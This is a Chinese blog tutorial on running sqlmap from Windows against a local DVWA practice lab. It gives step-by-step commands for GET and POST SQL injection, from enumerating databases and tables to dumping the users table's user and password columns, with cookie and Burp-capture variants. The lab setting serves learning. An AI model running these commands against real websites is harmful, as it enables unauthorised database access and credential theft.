sqlmap在windows上执行sql注入,利用dvwa靶场

最新推荐文章于 2024-05-16 21:13:46 发布
最新推荐文章于 2024-05-16 21:13:46 发布
阅读量947 收藏 5
点赞数 1
分类专栏: sqlmap
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46315342/article/details/106207320
版权

sqlmap在windows上执行sql注入,利用dvwa靶场

1.首先你要安装好sqlmap并且配置好坏境,不知道的百度搜索吧,还是比较简单的。
2.先安利一个博主手工注入的博客吧,建议学的时候先手工注入明白原理,体验一下痛楚,哈哈哈哈。
https://blog.csdn.net/qq_36119192/category_8345945.html
3.接下来我分享一下我的sqlmap注入过程

··1网上很多都是在kali linux上执行的,但是别人建议新手小白先不要用这个,所以我就在windows上执行的/

··2 windows+r打开命令窗口,将路径切换到sqlmap的安装路径下,我的路径在D 盘,仅作参考。接下来的语句在这里输入就可以了。
sqlmap文件夹打开差不多是这样的
在这里插入图片描述
3.从dvwa的sql injection low级别开始吧【盲注一样】
用sqlmap注入的好处好像有几个特别明显的,无论是普通的注入还是盲注,语句方法都一样,只要区分是get型还是post型,还可以避免后端代码的一些过滤函数。
在这里插入图片描述先输入个1试一下,看见地址栏的变化,很快就可以知道是get型,或者点击右下角的views source查看后端代码也可以看出是get型。

get 型(不管是普通注入还是盲注都一样)
方法一:
1.python sqlmap.py -u "url" --dbs
2.python sqlmap.py -u "url" --current-db
3.python sqlmap.py -u "url" -D 数据库名 --tables
4.python sqlmap.py -u "url"  -D 数据库名 -T 表名 --columns
5.python sqlmap.py -u "url"  -D 数据库名 -T 表名 -C 列名1,列名2 --dump

方法二:【加上cookie的,好像不怎么用,先用bp抓吧,将cookie值加上即可】
1.1.python sqlmap.py -u "url"  
	--cookie ""--dbs
其他步骤都一样

严格按照上面的代码就可以实现注入了。没有引号的地方不要擅自加上引号,大小写严格区分。
我这里放一下我自己执行的语句吧,

1.python sqlmap.py -u "http://127.0.0.1/DVWA-master/DVWA-master/vulnerabilities/sqli_blind/?id=1&Submit=Submit#"  --cookie "security=low; PHPSESSID=---------"--dbs

其他的就按照这条语句把后面的改一下就好了,不要复制我的url,可能安装的路径不一样。
、、至于方法二中的cookie是因为有些网站有网页的跳转什么的,获取cookie的方法,用burpsuite抓包就可以看到cookie。这个题目就需要加上cookie才能得到注入结果。在注入过程中,需要恢复y\n之类的,一般填y就可以,如果你不想麻烦,在语句的最后加上 --batch 就可以实现全自动。

4.接下来讲一下dvwa 的medium级别
在这里插入图片描述先输入个1试一下,看见地址栏无变化,很快就可以知道是post型,或者点击右下角的views source查看后端代码也可以看出是post型。

post 型(不管是普通注入还是盲注都一样)【好像还可以忽略是数字型还是字符型】
方法一:【--data ""】【不行时需要加上--cookie ""在--data ""后面】
1.python sqlmap.py -u "url" --data "id=1&Submit=Submit" --dbs	
	【--data后面的内容是post提交时的内容,可以用BP抓包查看】
2.python sqlmap.py -u "url" --data "id=1&Submit=Submit" --current-db
3.python sqlmap.py -u "url" --data "id=1&Submit=Submit" -D dvwa --tables
4.python sqlmap.py -u "url" --data "id=1&Submit=Submit" -D dvwa -T users --columns
5.python sqlmap.py -u "url" --data "id=1&Submit=Submit" -D dvwa -T users -C user,password --dump


方法二:【-r 文件路径】需要先用BP抓包,然后右键copy to file存起来, 
1.python sqlmap.py -r sqlmapExperiment/5.txt --dbs
2.python sqlmap.py -r sqlmapExperiment/5.txt --current-db
3.python sqlmap.py -r sqlmapExperiment/5.txt -D dvwa --tables
4.python sqlmap.py -r sqlmapExperiment/5.txt -D dvwa -T users --columns
5.python sqlmap.py -r sqlmapExperiment/5.txt -D dvwa -T users -C user,password --dump

方法一就不详细讲了,没什么特别的,讲一下方法二的文件吧。
1.用bp抓包,然后右键选择copy to file,存起来,-r 后面的是文件路径
看一下我的文件路径在这里插入图片描述我这里在sqlmap文件夹里建了一个sqlmapExperiment来存储文件。
讲一下用bp的存储过程
在这里插入图片描述点进去之后自己找路径存下,一般的可以直接存储在sqlmap文件夹下,也可以像我一样建一个文件夹专门存储这个,所以-r 后面的相对路径会不同。

就先讲到这里吧,有问题的可以私信。欢迎大家提意见。

小哈小哈喽
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
kali之使用sqlmap进行sql注入
weixin_34284188的博客
06-14 2705
sqlmap简介 sqlmap支持五种不同的注入模式: 1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。 2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。 3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。 4、联合查询注入,可以使用union的情况下的注入。 5、堆...
sqlmapwindows执行sql注入利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
windows SQLMAP注入
deseshiba的博客
06-04 1635
0x 00 前言 正是SQLMAP这种神器的存在,SQL注入简直Easy到根本停不下来… PS:国内类似软件也有阿D,明小子,挖掘机,当你用过他们之后你才会发现SQLMap才是绝对的注入神器 0x 01 注入原理 开始分割线 时间原因,这段内容就先不写了 就是因为太重要了所以要整理好在写上哈 虽然事实上是我现在还没搞太明白我会乱说 :) 结束分割线 0x 02 安装SQLMap 1. 安装pyth...
Windows主机sqlmap安装及使用
XLbb的博客
05-07 1505
说明:sqlmap需下载python2.7.9版本、在win命令行运行。 1.1python安装: 设置环境变量:python的安装路径和scripts路径添加到电脑主机环境变量 步骤:打开环境变量:【此电脑】--右击属性-高级系统设置--高级-环境变量--admin的用户变量--Path--编辑--添加C:\Python27\Scripts和C:\Python27\--确认关闭 2、下载sqlmap软件文件。 打开sqlmap目录,在sqlmap软件目录下输入cmd进入命令行
SQLMapwindows下的安装、使用及进阶
jhfjdf的博客
09-13 9230
SQLMap简要介绍支持的数据库支持的注入方式其他功能安装SQLMap的使用SQLMap的入门判断是否存在注入判断文本中的请求是否存在注入 简要介绍 一个自动化的注入工具。功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过的插件。 支持的数据库 MySQL、Oracle、PostgreSQL、Microsoft SQL Sever、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase和SAP MaxDB。 支持的注入方式 盲注(布尔盲注和时间盲注)、
Security ❀ Windows系统下如何使用sqlmap
无糖可乐没有灵魂
11-10 2507
文章目录1、下载sqlmap2、安装python3、将sqlmap放入python目录下4、建立快捷方式5、sqlmap帮助手册 1、下载sqlmap sqlmap下载链接:https://sqlmap.org/ 点击此处自动跳转下载sqlmap网页 点击红框内图标进行下载sqlmapsqlmap为python编译,需要运行在python环境下; 2、安装python Python下链接:https://www.python.org/getit/ 点击此处自动跳转下载python网页 可以在一些软件
高级SQL Injection技巧(For MSSQL)
03-09 1921
一、常用注入点1.http://xxx.xxx.xxx?id=1 and [查询]select * from table where id=1 and [查询]2.http://xxx.xxx.xxx?name=test and [查询] and =select * from table where name=test and [查询] and =3.http://
windows环境下sqlmap安装教程及问题详解
qq_46700234的博客
02-13 7788
windows环境下sqlmap安装教程及问题详解
Windows下安装sqlmap及应用
汪敏的博客
08-02 1561
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档。
利用sqlmapapi进行批量检测sql注入
03-28
本程序利用百度爬取特定的url链接,然后调用sqlmapapi(sqlmap自带的批量接口),进行注入的判断。 AutoSqli.py中option的设置可参考set_option.txt;可自定义判断注入的方法,例如,基于时间/布尔等。
sqlmap sql 注入测试工具
03-06
SQLMap是一款强大的、自动化SQL注入测试工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全专家或IT从业者在不熟悉目标系统的情况下,轻松发现并利用潜在的SQL注入漏洞,确保系统的安全性。 1. SQL注入简介:...
java开发基于SQLmapSQL注入工具源码.zip
06-01
基于SQLmapSQL注入工具源码.。基于SQLmap,使用Java开发 安装教程 安装JDK(需要有javafx) 安装Python 安装SQLmap 基于SQLmapSQL注入工具源码.。基于SQLmap,使用Java开发 安装教程 安装JDK(需要有javafx)...
sqlmap中文手册-sql注入自动化测试工具
07-19
SQLMap是一款强大的自动化工具,专门用于检测和利用SQL注入漏洞。它可以帮助安全测试人员和渗透测试专家快速识别和利用Web应用程序中的SQL注入弱点,从而获取数据库中的敏感信息,甚至控制底层文件系统和操作系统。...
Sqlmap
mumuzi2的博客
02-25 387
下载地址: http://sqlmap.org/ 需要环境: python 使用方法:
SQL注入测试工具SQLmap的使用方法
weixin_45811834的博客
06-15 1632
SQLmap是一个自动化SQL注入工具,可以用于检测和利用Web应用程序中的SQL注入漏洞。通过学习和使用SQLmap,我们可以更好地保护我们的Web应用程序免受黑客攻击。在命令提示符中,使用cd命令进入SQLmap所在的目录。这个命令将向Web应用程序发送一个带有注入参数的请求,SQLmap会自动检测和利用SQL注入漏洞,并尝试获取数据库名。通过学习和使用SQLmap,我们可以更好地保护我们的Web应用程序免受黑客攻击。在Windows中,按下Win+R,输入cmd并回车,打开命令提示符。
window下使用sqlmap探测sql注入漏洞
MOONYOUS的博客
03-22 556
window下使用sqlmap探测sql注入漏洞 sql注入:攻击者用非法的参数向服务端执行数据,服务端没有对输入进行校验就直接执行了攻击者输入的非法操作,从而产生sql注入 在python文件夹中放入sqlmap文件夹 后进入cmd 找到文件夹后执行python sqlmap.py 这里对DVWA靶场进行操作 Cookie,指某些网站为了辨别用户身份、进行 session 跟踪而储存在用户本地终端上的数据 需要登录才能进行操作的网站查找sql注入漏洞。必须获取到cookie值 或者bp抓包
SQLMAP的下载安装和使用(Windows)
最新发布
weixin_68416970的博客
05-16 1703
SQLMAP 是一款广泛使用的开源 SQL 注入检测和利用工具。本文介绍了SQLMAP的下载安装和基本使用。SQLMAP 这样的工具在合法的安全测试和研究环境之外的使用可能是非法的和不道德的。在实际应用中,应该在授权和合法的情况下使用它来帮助发现和修复系统中的安全漏洞,以提高系统的安全性。
使用SQLmap检测SQL注入DVWA实战教程
“通过sqlnamp检测sql注入漏洞的随堂笔记,包括安装SQLmapDVWA,以及SQL注入的概述和SQLmap的介绍。” 在网络安全领域,SQL注入是一种常见的攻击手段,它允许攻击者通过在Web应用的输入字段中插入恶意SQL代码,来...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值